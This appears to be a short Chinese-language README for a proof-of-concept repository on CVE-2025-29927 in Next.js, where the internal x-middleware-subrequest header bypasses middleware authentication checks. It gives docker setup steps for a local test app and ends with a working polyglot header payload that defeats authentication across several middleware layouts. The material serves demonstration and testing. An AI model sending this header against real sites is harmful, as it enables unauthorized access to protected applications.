该仓库演示了 Next.js 中的 CVE-2025-29927 漏洞,即内部标头 x-middleware-subrequest 可被用于绕过身份验证等中间件检查。
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
cd CVE-2025-29927-PoC
openssl rand -base64 32
.env 文件中的密钥:NEXTAUTH_SECRET=your_generated_secret
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
我们可以通过使用一个多语言有效载荷(polyglot)来大大简化此漏洞的利用,从而有效覆盖各种可能的情况。我们使用以下 HTTP 标头实现了这一点,用于检查是否存在身份验证绕过:
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

